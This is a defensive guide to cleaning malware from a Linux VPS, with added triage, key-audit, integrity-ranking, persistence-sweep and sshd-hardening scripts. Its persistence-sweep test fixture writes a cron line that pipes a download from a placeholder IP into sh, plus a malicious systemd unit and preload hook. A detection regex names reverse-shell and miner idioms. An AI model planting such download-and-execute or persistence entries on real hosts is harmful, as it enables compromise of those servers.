Learn how to remove malware from a Linux VPS using structured incident response, advanced scanning, integrity checks, and server hardening best practices.
Malware incidents on a Linux VPS are not rare. They are usually the result of weak credentials, outdated packages, exposed services, or misconfigured applications. When an incident occurs, the response must be structured, calm, and technically sound. A rushed cleanup often leaves persistence mechanisms behind.
Prerequisites
Before we begin, ensure we have the following:
- A Linux distribution installed on a dedicated server or KVM VPS.
- Basic Linux command-line knowledge.
- Out-of-band access to the server (provider console or rescue mode), so that a firewall or SSH change that locks us out does not end the investigation.
The steps below walk through removing malware from a Linux VPS.
Step 1: Isolate the VPS Immediately
Before running any commands on the host, we contain the risk.
If possible:
- Disable public access using cloud firewall rules or security groups, allowing only our own management IP.
- Restrict SSH access to a single trusted IP. Add the allow rule before any deny rule, or we lock ourselves out.
- Stop public-facing services temporarily (nginx, apache, node, etc.).
Example:
sudo systemctl stop nginx
sudo systemctl stop apache2
If the VPS is actively sending spam or participating in outbound attacks, block outgoing traffic at the provider firewall level as well. A host-level firewall can be undone by malware running as root; the provider's firewall cannot.
Containment prevents further damage and reinfection during the investigation.
Step 2: Do Not Reboot Immediately
Rebooting destroys volatile forensic evidence: running processes, open network connections, malware that exists only in memory or on a tmpfs such as /dev/shm, and everything under /proc. Collect that state first and keep the output, redirected into a directory outside /tmp (a common malware drop location that may itself be a tmpfs):
who
w
last -a
ss -tulnp
ps auxf
Check for:
- Unknown logged-in users
- Suspicious listening ports, or sockets with no owning process shown (a sign of process hiding)
- Processes running from /tmp, /dev/shm, or hidden directories, or whose /proc/PID/exe link ends in (deleted)
- High CPU usage from unknown binaries
Attackers often run malware from:
/tmp/
/var/tmp/
/dev/shm/
/home/*/.cache/
/usr/local/bin/ (unknown files)
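The following script is an added example and not part of the original article. It collects the volatile state listed above into a timestamped evidence directory, hashes what it collected, and walks /proc directly (rather than trusting ps, which a userland rootkit can filter) to flag processes by where their executable lives. It assumes an evidence directory under /root/ir-evidence and the standard coreutils, procps and iproute2 tools; the path classification is a heuristic built from the locations named above and the (deleted) marker.

```bash
#!/bin/sh
# Added example (not from the original article): volatile triage collection.
# Assumptions: evidence directory under /root/ir-evidence (outside /tmp, which may be
# a tmpfs and is a common malware drop location); coreutils, procps and iproute2 present.
set -u

# Classify a process by the resolved path of /proc/PID/exe. Heuristic: the directories
# named in the article, a hidden directory anywhere in the path, or a "(deleted)" marker,
# which means the binary was removed after the process started.
classify_exe() {
  case "$1" in
    "")                            echo unknown ;;     # readlink failed: kernel thread, or hidden from us
    *" (deleted)")                 echo suspicious ;;
    /tmp/*|/var/tmp/*|/dev/shm/*)  echo suspicious ;;
    /home/*/.cache/*|*/.*/*)       echo suspicious ;;  # hidden directory component in the path
    /usr/local/bin/*)              echo review ;;      # legitimate for admin tools; confirm who installed it
    *)                             echo ok ;;
  esac
}

# Walk /proc directly rather than trusting ps: a userland rootkit can filter ps output.
scan_processes() {
  for d in /proc/[0-9]*; do
    pid=${d#/proc/}
    exe=$(readlink "$d/exe" 2>/dev/null || true)
    verdict=$(classify_exe "$exe")
    case "$verdict" in
      suspicious|review)
        cmd=$(tr '\0' ' ' < "$d/cmdline" 2>/dev/null || true)
        printf '%s\tpid=%s\texe=%s\tcmd=%s\n' "$verdict" "$pid" "${exe:-?}" "$cmd" ;;
    esac
  done
}

# Run each command, saving stdout+stderr with the command line as a header.
collect_triage() {
  out=${1:-/root/ir-evidence/$(date -u +%Y%m%dT%H%M%SZ)}
  mkdir -p "$out" && chmod 700 "$out"
  save() { name=$1; shift; { echo "# $*"; "$@"; } > "$out/$name.txt" 2>&1; }
  save date        date -u
  save who         who -a
  save w           w
  save last        last -a -F
  save lastb       lastb -a -F              # failed logins, from /var/log/btmp
  save listening   ss -tulnp
  save connections ss -antup
  save ps          ps auxfww
  save mounts      cat /proc/mounts
  save modules     lsmod
  save ld_preload  cat /etc/ld.so.preload   # should not exist; an entry here is loaded into every process
  scan_processes > "$out/suspicious-processes.txt"
  ( cd "$out" && sha256sum ./* > SHA256SUMS )   # fix the evidence before anything else is touched
  echo "$out"
}

case "${1:-}" in
  collect) collect_triage "${2:-}" ;;
  scan)    scan_processes ;;
esac
```

Run it as root with `collect` to write the evidence directory (its path is printed), or with `scan` to only list flagged processes. Copy the directory off the host before cleanup starts, since a root-level attacker can alter or delete it.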
Step 3: Check for Unauthorized Users and SSH Keys
List all users:
cat /etc/passwd
Look for unexpected accounts with a login shell such as /bin/bash, and for any account other than root with UID 0.
Check SSH keys:
cat /root/.ssh/authorized_keys
cat /home/*/.ssh/authorized_keys
Also check authorized_keys2 files (honoured by default) and the AuthorizedKeysFile directive in sshd_config, since an attacker can point it at a file outside the usual location.
Remove unknown public keys immediately.
Then rotate all passwords, not only root's:
passwd root
If possible, disable password authentication entirely and enforce SSH key login. Make sure a non-root user with a working key and sudo access exists first, or PermitRootLogin no will lock us out.
Edit:
sudo nano /etc/ssh/sshd_config
Set:
PasswordAuthentication no
PermitRootLogin no
Validate the file with sshd -t, restart SSH, and confirm a new login works from a second terminal before closing the current session:
sudo systemctl restart sshd
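As an added example (not from the original article), the script below turns the account and key review into a repeatable check: it lists every account that can log in, reduces each authorized_keys line to its key material so that prepended options such as command="..." cannot disguise a key, and reports any key not present in an allowlist of known-good public keys. It assumes the allowlist is kept off the host and takes a root prefix so it can also run against a disk mounted from a rescue system. The sample passwd and key files it builds are constructed placeholders, not real keys.

```bash
#!/bin/sh
# Added example (not from the original article): audit login-capable accounts and
# authorized_keys entries against an allowlist of known-good public keys.
# Assumptions: an allowlist file maintained outside the host (a constructed sample here),
# and a root prefix so the same checks can run on a mounted disk image.
set -u

# Accounts that can log in: UID 0, or a shell that is not nologin/false.
list_login_accounts() {
  awk -F: '$3 == 0 || ($7 != "" && $7 !~ /(nologin|false)$/) { print $1 ":" $3 ":" $7 }' "$1"
}

# Reduce each authorized_keys line to "type base64", dropping options such as command="...".
key_blobs() {
  awk '/^[[:space:]]*(#|$)/ { next }
       { for (i = 1; i <= NF; i++) if ($i ~ /^(ssh-|ecdsa-|sk-)/) { print $i " " $(i + 1); break } }' "$1"
}

# Print OK/UNKNOWN per installed key. $1: authorized_keys file, $2: allowlist file.
audit_authorized_keys() {
  allowed=$(key_blobs "$2")
  key_blobs "$1" | while IFS= read -r blob; do
    if printf '%s\n' "$allowed" | grep -qxF -- "$blob"; then
      echo "OK       ${blob%% *} $(printf '%s' "${blob#* }" | cut -c1-24)..."
    else
      echo "UNKNOWN  $blob"
    fi
  done
}

count_unknown_keys() { audit_authorized_keys "$1" "$2" | grep -c '^UNKNOWN' || true; }

# Walk every home directory listed in passwd; authorized_keys2 is also honoured by default sshd.
audit_host_keys() {
  root=${1%/}; allow=$2
  awk -F: '{ print $1 ":" $6 }' "$root/etc/passwd" | while IFS=: read -r user home; do
    for f in "$root$home/.ssh/authorized_keys" "$root$home/.ssh/authorized_keys2"; do
      [ -s "$f" ] && audit_authorized_keys "$f" "$allow" | sed "s|^|$user  |"
    done
  done
  # A non-default AuthorizedKeysFile lets an attacker keep keys outside ~/.ssh.
  grep -iE '^[[:space:]]*AuthorizedKeysFile' "$root/etc/ssh/sshd_config" 2>/dev/null || true
}

# Constructed sample data; the key material below is placeholder text, not real keys.
make_sample_root() {
  mkdir -p "$1/etc/ssh" "$1/root/.ssh"
  cat > "$1/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
deploy:x:1000:1000::/home/deploy:/bin/bash
sysupd:x:0:0::/var/tmp/.s:/bin/sh
EOF
  cat > "$1/root/.ssh/authorized_keys" <<'EOF'
# admin workstation key
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERknownadminkey0000000000000000 admin@laptop
command="/bin/sh",no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCPLACEHOLDERunknownkey00000000 x
EOF
  printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERknownadminkey0000000000000000 admin@laptop\n' > "$1/allowlist.pub"
}

case "${1:-}" in
  demo) d=$(mktemp -d); make_sample_root "$d"; list_login_accounts "$d/etc/passwd"; audit_host_keys "$d" "$d/allowlist.pub" ;;
  host) audit_host_keys "${2:-/}" "${3:?allowlist file required}" ;;
esac
```

In the sample, the second UID 0 account (sysupd) and the ssh-rsa key with a forced command are exactly the findings this step is looking for. On a live host, run it as `host / /path/to/allowlist.pub`; the allowlist must come from somewhere the attacker could not edit.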
Step 4: Identify Suspicious Processes
List top CPU consumers:
top
Or:
ps aux --sort=-%cpu | head
ps aux --sort=-%mem | head
A rootkit or a malicious entry in /etc/ld.so.preload can hide processes from ps and top. If ss shows a socket with no owning process, or /proc contains PIDs that ps does not list, treat the host as rootkitted and lean towards a rebuild (Step 11).
Investigate unknown PIDs:
ls -l /proc/PID/exe
If the link target ends in (deleted), the binary was removed after launch to frustrate analysis; the running image can still be copied out of /proc/PID/exe for later examination.
Record the file hash, then check the binary against the package database, since a hash on its own proves nothing without a trusted value to compare it with:
sha256sum /path/to/binary
Debian / Ubuntu (debsums is a separate package; install it with apt install debsums)
sudo debsums -s
AlmaLinux / Rocky
sudo rpm -Va
Both list packaged files whose contents no longer match the installed package. A modified ps, ss, ls, find or sshd means the attacker replaced system binaries, and every result obtained with those tools is suspect. Both checks also trust the package database on the host, which a root-level attacker can tamper with; for a trustworthy result, verify from a rescue system or against packages re-downloaded from the distribution mirrors.
If the executable points to /tmp or another unusual path, or integrity verification flags it, it is likely malicious.
Preserve a copy of the binary (and, ideally, its /proc/PID/maps and environ) in the evidence directory before terminating it, then kill the process:
sudo kill -9 PID
Then remove the binary carefully. Moving it into an evidence directory with 0700 permissions is better than deleting it outright, and check whether it carries the immutable attribute (lsattr), which malware sets to resist removal.
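Integrity verification on a compromised host can produce hundreds of lines, most of them harmless config and timestamp changes. The following added example (not from the original article) ranks `rpm -Va` and `debsums -s` output saved to a file so the replaced system binaries surface first. The decoding of rpm's flag string follows rpm's documented format; the severity rules (a digest change under a binary or library directory is HIGH, config or documentation changes are INFO, mode or owner changes MEDIUM, timestamp-only LOW) are the editor's heuristic, and the sample output is constructed.

```bash
#!/bin/sh
# Added example (not from the original article): rank `rpm -Va` / `debsums -s` findings.
# rpm -V prints a 9-character flag string (S size, M mode, 5 digest, D device, L link,
# U user, G group, T mtime, P capabilities, "." unchanged, "?" untestable), an optional
# attribute letter (c config, d documentation, g ghost, l license, r readme) and the path.
# debsums -s prints "debsums: changed file PATH (from PKG package)". Severity rules are heuristic.
set -u

# Rate a file whose content changed, by where it lives. $1: path, $2: reason text.
rate_changed() {
  case "$1" in
    /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*|/lib*|/usr/lib*|/usr/libexec/*|/boot/*)
      printf 'HIGH\t%s\tsystem binary or library content changed: %s\n' "$1" "$2" ;;
    /usr/share/doc/*|/usr/share/man/*)
      printf 'INFO\t%s\tdocumentation changed: %s\n' "$1" "$2" ;;
    *) printf 'MEDIUM\t%s\tpackaged file content changed: %s\n' "$1" "$2" ;;
  esac
}

# Classify one output line. Output: SEVERITY<TAB>path<TAB>reason
classify_verify_line() {
  line=$1
  case "$line" in
    "") return 0 ;;
    "debsums: changed file "*)
      p=${line#debsums: changed file }; p=${p%% (from *}; rate_changed "$p" "digest mismatch" ;;
    "debsums: missing file "*)
      p=${line#debsums: missing file }; p=${p%% (from *}; printf 'HIGH\t%s\tpackaged file missing\n' "$p" ;;
    *)
      set -f; set -- $line; set +f            # split on whitespace without globbing the path
      [ $# -gt 0 ] || return 0
      flags=$1; shift; attr=""
      case "${1:-}" in [cdglr]) attr=$1; shift ;; esac
      p=${1:-}
      if [ "$flags" = missing ]; then printf 'HIGH\t%s\tpackaged file missing\n' "$p"; return 0; fi
      printf '%s' "$flags" | grep -Eq '^[SM5DLUGTP.?]{9}$' || { printf 'SKIP\t-\t%s\n' "$line"; return 0; }
      case "$attr" in c|d) printf 'INFO\t%s\tconfig/doc file modified (%s)\n' "$p" "$flags"; return 0 ;; esac
      case "$flags" in
        *5*)             rate_changed "$p" "flags $flags" ;;
        *M*|*U*|*G*|*L*) printf 'MEDIUM\t%s\tmode, owner or symlink target changed (%s)\n' "$p" "$flags" ;;
        *)               printf 'LOW\t%s\tonly size or timestamp differs (%s)\n' "$p" "$flags" ;;
      esac ;;
  esac
}

# Classify a whole saved output file and sort HIGH first.
triage_verify_output() {
  while IFS= read -r l; do classify_verify_line "$l"; done < "$1" |
    awk -F'\t' '{ r = ($1 == "HIGH") ? 0 : ($1 == "MEDIUM") ? 1 : ($1 == "LOW") ? 2 : ($1 == "INFO") ? 3 : 4
                  print r "\t" $0 }' | sort -n | cut -f2-
}

count_severity() { triage_verify_output "$2" | awk -v s="$1" -F'\t' '$1 == s { n++ } END { print n + 0 }'; }

# Constructed sample mixing rpm -Va and debsums -s lines (not real scan output).
sample_verify_output() {
  cat <<'EOF'
S.5....T.    /usr/bin/ps
..5....T.  c /etc/ssh/sshd_config
.......T.    /usr/lib64/libc.so.6
missing     /usr/sbin/ss
.M.......    /usr/bin/find
debsums: changed file /usr/bin/ls (from coreutils package)
debsums: changed file /usr/share/doc/bash/README (from bash package)
EOF
}

case "${1:-}" in
  demo) f=$(mktemp); sample_verify_output > "$f"; triage_verify_output "$f" ;;
  file) triage_verify_output "${2:?saved rpm -Va or debsums -s output}" ;;
esac
```

Save the real output first (`sudo rpm -Va > /root/ir-evidence/rpm-verify.txt 2>&1`, or the same for `debsums -s`), then feed the file in with `file`. In the constructed sample, the replaced ps and ls and the missing ss come out on top, while the edited sshd_config is correctly demoted to INFO for a human to read rather than auto-flagged.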
Step 5: Scan the Server for Malware
Install scanning tools. They catch known commodity malware; they do not prove a host is clean.
On Ubuntu / Debian:
sudo apt update
sudo apt install clamav rkhunter chkrootkit -y
On AlmaLinux / Rocky Linux:
sudo dnf install epel-release -y
sudo dnf install clamav rkhunter chkrootkit -y
Update ClamAV signatures. On Debian and Ubuntu the clamav-freshclam service may already be running and holding the log lock, in which case either stop it first or let it fetch the signatures:
sudo freshclam
Run a full scan, skipping the pseudo-filesystems:
sudo clamscan -r -i --exclude-dir='^/(proc|sys|dev|run)' /
Run rootkit scanners. Update rkhunter's data files first, but never run rkhunter --propupd on a suspect host, since that records the current (possibly trojaned) binaries as the known-good baseline:
sudo rkhunter --update
sudo rkhunter --check --skip-keypress
sudo chkrootkit
Review the results and /var/log/rkhunter.log carefully instead of deleting blindly. Both tools produce false positives, and a clean result does not mean the host is clean; custom malware and kernel rootkits are frequently missed.
Step 6: Inspect Cron Jobs and Systemd Persistence
Malware often persists using scheduled tasks, services, and shell startup files.
Check cron for every user, not only the current one:
crontab -l
sudo ls -al /etc/cron*
Also review /var/spool/cron (per-user crontabs), /etc/anacrontab, pending at jobs (atq), and systemd timers.
Look for encoded commands, curl/wget downloads piped to a shell, base64 strings, or anything executing from /tmp, /var/tmp or /dev/shm.
Check systemd services and timers:
systemctl list-unit-files --type=service
systemctl list-timers --all
Inspect suspicious services:
sudo systemctl status suspicious.service
A unit name imitating a legitimate service, or an ExecStart pointing at an odd path, is the giveaway. Remove unknown services, stopping them first:
sudo systemctl disable --now suspicious.service
sudo rm /etc/systemd/system/suspicious.service
Reload systemd:
sudo systemctl daemon-reload
Also check user-level units under ~/.config/systemd/user, /etc/rc.local, /etc/profile.d, the shell rc files of every account, and /etc/ld.so.preload, which on a healthy server is absent or empty.
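Checking each of these locations by hand is error-prone, so here is an added example (not from the original article) that sweeps them in one pass. It takes a root prefix, so the same sweep runs against a disk mounted under /mnt from a rescue system, where a rootkit on the live host cannot interfere. The indicator regex (download-and-execute, base64 decoding, execution from temp directories, reverse-shell idioms, chattr +i, miner pool URLs) is a heuristic and will miss things; the sample tree it builds is constructed, including the TEST-NET address.

```bash
#!/bin/sh
# Added example (not from the original article): sweep the usual persistence locations
# for indicators. Takes a root prefix so it also works against a disk mounted from a
# rescue system. The indicator regex is a heuristic, not a complete list.
set -u

PERSIST_PATHS="etc/crontab etc/cron.d etc/cron.hourly etc/cron.daily etc/cron.weekly etc/cron.monthly \
etc/anacrontab var/spool/cron etc/rc.local etc/init.d etc/profile etc/profile.d etc/bash.bashrc etc/bashrc \
etc/systemd/system usr/lib/systemd/system lib/systemd/system"

# Download-and-execute, decoding, temp-dir execution, reverse shells, attribute locking, miners.
IOC_RE='(curl|wget)[^|]*[|][[:space:]]*(ba|z|da)?sh|base64[[:space:]]+(-d|--decode)|/dev/shm/|/var/tmp/|/tmp/|/dev/tcp/|nc[[:space:]]+-[a-z]*[ec]|bash[[:space:]]+-i|python[23]?[[:space:]]+-c|perl[[:space:]]+-e|chattr[[:space:]]+[+-]i|stratum[+]tcp|xmrig'

scan_persistence() {
  root=${1:-/}; root=${root%/}
  for rel in $PERSIST_PATHS; do
    [ -e "$root/$rel" ] && grep -rEHn -- "$IOC_RE" "$root/$rel" 2>/dev/null || true
  done
  # Per-user startup files and user-level systemd units.
  for home in "$root"/root "$root"/home/*; do
    [ -d "$home" ] || continue
    for f in "$home/.bashrc" "$home/.profile" "$home/.bash_profile" "$home/.bash_logout" "$home/.config/systemd/user"; do
      [ -e "$f" ] && grep -rEHn -- "$IOC_RE" "$f" 2>/dev/null || true
    done
  done
  # ld.so.preload is absent or empty on a healthy server; any entry is loaded into every process.
  [ -s "$root/etc/ld.so.preload" ] && echo "$root/etc/ld.so.preload: non-empty: $(tr '\n' ' ' < "$root/etc/ld.so.preload")"
  return 0
}

# On a live host, per-user crontabs are also reachable through cron itself (needs root).
list_all_crontabs() {
  cut -d: -f1 /etc/passwd | while IFS= read -r u; do
    crontab -l -u "$u" 2>/dev/null | sed "s/^/$u: /"
  done
}

# Constructed sample tree: one malicious cron job, one malicious unit, a preload hook,
# plus a legitimate cron script, unit and .bashrc that must not be flagged.
make_sample_tree() {
  mkdir -p "$1/etc/cron.d" "$1/etc/cron.daily" "$1/etc/systemd/system" "$1/home/deploy"
  printf '*/5 * * * * root curl -s http://198.51.100.7/u.sh | sh\n' > "$1/etc/cron.d/system-update"
  printf '#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.conf\n' > "$1/etc/cron.daily/logrotate"
  printf '[Service]\nExecStart=/tmp/.X11-unix/.sysupdate --config /tmp/.X11-unix/c.json\nRestart=always\n' > "$1/etc/systemd/system/sysupdate.service"
  printf '[Service]\nExecStart=/usr/sbin/nginx -g "daemon on;"\n' > "$1/etc/systemd/system/nginx.service"
  printf '/usr/local/lib/libhide.so\n' > "$1/etc/ld.so.preload"
  printf 'export PATH="$HOME/.local/bin:$PATH"\n' > "$1/home/deploy/.bashrc"
}

case "${1:-}" in
  scan)     scan_persistence "${2:-/}" ;;
  crontabs) list_all_crontabs ;;
  demo)     d=$(mktemp -d); make_sample_tree "$d"; scan_persistence "$d" ;;
esac
```

Every hit is printed as file:line:content, so the findings can be reviewed and then removed with the disable/rm/daemon-reload sequence above. The ld.so.preload check fires on any content at all, because a single library listed there is mapped into every process on the system, which is how several userland rootkits hide their processes from ps.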
Step 7: Verify Web Application Integrity
If this VPS hosts a website:
Compare files against a clean backup or, for a CMS, against a fresh download of the same release (for WordPress, wp core verify-checksums does this for core files).
Check for injected PHP backdoors like:
eval(base64_decode(
Search quickly, restricting the search to PHP files and listing each matching file once:
grep -Rl --include='*.php' "base64_decode" /var/www/
grep -Rl --include='*.php' "shell_exec" /var/www/
grep -Rl --include='*.php' "gzinflate" /var/www/
Legitimate code uses base64_decode too, so read the hits rather than deleting every match; a decode or request variable fed straight into eval, assert or a shell function is the real signature. Also list PHP files inside upload directories, which should contain only media, look for PHP files modified more recently than the last deployment, and check .htaccess files for handlers that execute other extensions as PHP or set auto_prepend_file.
Remove unauthorized files and restore from a verified backup.
If WordPress or CMS-based, update core, themes, and plugins immediately, rotate the database and admin credentials, and review the administrator list for accounts the attacker added.
Step 8: Inspect Network Activity in Depth
Check real-time connections and the processes owning them:
ss -antup
Install monitoring tools if required (on AlmaLinux / Rocky they come from EPEL):
sudo apt install iftop nethogs -y
Monitor outbound traffic:
sudo iftop
Validate that no unusual external endpoints are being contacted. Long-lived connections to a single IP, connections on mining-pool or IRC ports, and traffic from a service account that should never talk outbound are the usual signs. Also check /etc/hosts and /etc/resolv.conf for tampering.
Also inspect firewall rules, both for holes the attacker opened and for rules the attacker added:
sudo iptables -L -n -v
sudo nft list ruleset
Step 9: Update and Patch the Entire System
Many infections start with a known vulnerability in outdated software, the rest mostly with weak or leaked credentials.
Run:
Ubuntu / Debian
sudo apt update && sudo apt upgrade -y
AlmaLinux / Rocky
sudo dnf update -y
Also verify which kernel is running, and compare it with the newest installed one:
uname -r
If kernel updates were installed, schedule a reboot once the cleanup is complete and the evidence has been copied off the host.
Step 10: Harden the VPS After Cleanup
Cleaning is not enough. Hardening prevents recurrence.
Install Firewall
Ubuntu:
sudo apt install ufw -y
sudo ufw default deny incoming
sudo ufw limit OpenSSH
sudo ufw enable
(limit rather than allow rate-limits repeated SSH connection attempts from one address.)
AlmaLinux / Rocky:
sudo dnf install firewalld -y
sudo systemctl enable --now firewalld
firewalld permits ssh in its default public zone; add only the services the host actually serves, for example firewall-cmd --permanent --add-service=https followed by firewall-cmd --reload.
Install Fail2Ban
sudo apt install fail2ban -y
or
sudo dnf install fail2ban -y
Then enable the service (sudo systemctl enable --now fail2ban). Debian and Ubuntu ship with the sshd jail enabled; on AlmaLinux / Rocky it must be switched on in a jail.local or jail.d file.
Enable Automatic Security Updates
Ubuntu / Debian:
sudo apt install unattended-upgrades
sudo dpkg-reconfigure -plow unattended-upgrades
AlmaLinux / Rocky:
sudo dnf install dnf-automatic -y
sudo systemctl enable --now dnf-automatic-install.timer
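The sshd settings from Step 3 and the fail2ban jail belong in drop-in files, and it is worth understanding why a drop-in wins: sshd keeps the first value it reads for each keyword, and the distribution's main sshd_config begins with an Include of sshd_config.d. The following added example (not from the original article) writes the hardening drop-ins under a root prefix and resolves the effective value the way sshd would, so the change can be verified before the service is restarted. It assumes a main config with the default Include line (Ubuntu 20.04+, Debian 12, RHEL 9 and derivatives), and the AllowUsers account name is a placeholder that must be replaced with the real admin account.

```bash
#!/bin/sh
# Added example (not from the original article): write hardening drop-ins under a root
# prefix and resolve what sshd will actually use. Assumes the main sshd_config carries the
# distribution default "Include /etc/ssh/sshd_config.d/*.conf" near the top. The AllowUsers
# account is a placeholder passed in by the caller.
set -u

write_sshd_dropin() {   # $1 root, $2 admin account that keeps SSH access
  mkdir -p "$1/etc/ssh/sshd_config.d"
  cat > "$1/etc/ssh/sshd_config.d/99-hardening.conf" <<EOF
# sshd keeps the first value it reads for each keyword, so an early Include makes these win.
PasswordAuthentication no
KbdInteractiveAuthentication no
PubkeyAuthentication yes
PermitRootLogin no
MaxAuthTries 3
LoginGraceTime 30
X11Forwarding no
AllowUsers $2
EOF
}

write_fail2ban_jail() { # $1 root; sshd jail with escalating bans, reading the journal directly
  mkdir -p "$1/etc/fail2ban/jail.d"
  cat > "$1/etc/fail2ban/jail.d/sshd.local" <<'EOF'
[sshd]
enabled = true
port = ssh
backend = systemd
maxretry = 5
findtime = 10m
bantime = 1h
bantime.increment = true
EOF
}

write_apt_auto_upgrades() { # $1 root; Debian/Ubuntu periodic unattended-upgrades switch
  mkdir -p "$1/etc/apt/apt.conf.d"
  printf 'APT::Periodic::Update-Package-Lists "1";\nAPT::Periodic::Unattended-Upgrade "1";\n' > "$1/etc/apt/apt.conf.d/20auto-upgrades"
}

harden_all() { write_sshd_dropin "$1" "$2"; write_fail2ban_jail "$1"; write_apt_auto_upgrades "$1"; }

# Print the config with Include directives expanded in place. $1: root, $2: file under root.
expand_sshd_config() {
  [ -f "$1$2" ] || return 0
  while IFS= read -r line || [ -n "$line" ]; do
    line=${line#"${line%%[![:space:]]*}"}          # strip leading whitespace
    case "$line" in
      [Ii]nclude[[:space:]]*)
        set -f; set -- "$1" $line; set +f; root=$1; shift 2
        for pat in "$@"; do
          case "$pat" in /*) ;; *) pat="/etc/ssh/$pat" ;; esac   # relative Includes live under /etc/ssh
          for inc in $root$pat; do [ -f "$inc" ] && expand_sshd_config "$root" "${inc#"$root"}"; done
        done ;;
      *) printf '%s\n' "$line" ;;
    esac
  done < "$1$2"
}

# First-match-wins lookup of a keyword, ignoring Match blocks. $1: root, $2: keyword.
sshd_effective() {
  expand_sshd_config "${1%/}" /etc/ssh/sshd_config |
    awk -v k="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
      /^[[:space:]]*(#|$)/ { next }
      /^Match([[:space:]]|$)/ { inmatch = 1 }
      !inmatch && tolower($1) == k { print $2; exit }'
}

# Constructed sample: a distribution-style main config that still allows passwords.
make_sample_root() {
  mkdir -p "$1/etc/ssh"
  printf 'Include /etc/ssh/sshd_config.d/*.conf\nPort 22\nPasswordAuthentication yes\nPermitRootLogin yes\n' > "$1/etc/ssh/sshd_config"
}

case "${1:-}" in
  apply) harden_all "" "${2:?admin account for AllowUsers}"
         echo "next: sshd -t && systemctl restart sshd && systemctl enable --now fail2ban" ;;
  show)  sshd_effective "" "${2:?keyword}" ;;
esac
```

Before restarting sshd on the live host, `show PasswordAuthentication` and `show PermitRootLogin` should both print no; if they print yes, the main config has no Include line (or it sits below the directive), and the drop-in is silently ignored.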
Step 11: Consider Full Rebuild if Root Was Compromised
If the attacker gained root, or we cannot prove they did not, the safest approach is:
- Back up data only: database dumps, uploaded content, application configuration. Never carry over binaries, scripts, cron entries or SSH keys from the compromised host, and scan whatever is restored.
- Deploy a fresh VPS image.
- Patch fully and harden before exposing it to the internet.
- Restore application data carefully.
- Rotate all API keys, database passwords, SMTP credentials, and any SSH keys or tokens that were stored on the compromised host.
In enterprise environments, rebuilding is usually faster and more reliable than partial cleanup, because a root-level attacker can have modified anything the cleanup relies on, including the tools used to check.
Step 12: Monitor for Recurrence
After bringing services online:
Monitor:
journalctl -xe
tail -f /var/log/auth.log
(On AlmaLinux / Rocky the SSH log is /var/log/secure, or use journalctl -f -u sshd.)
Track outbound traffic:
iftop
Watch for:
- Recreated cron jobs or systemd units
- Reappearing binaries or restored SSH keys
- Unusual outbound connections or traffic volume
Compare these locations against a baseline taken right after cleanup rather than relying on memory. Continuous monitoring is critical.
Final Recommendations
Malware removal on Linux VPS requires discipline, not panic. We isolate first, investigate carefully, remove persistence mechanisms, patch fully, and harden the environment.
For production systems handling customer data, rebuilding from a clean image is often the safest path.
Security is not a one-time fix. It is a continuous operational responsibility.
When we apply structured incident response, keep systems updated, restrict access properly, and monitor actively, Linux VPS environments remain resilient and stable even under constant internet exposure.
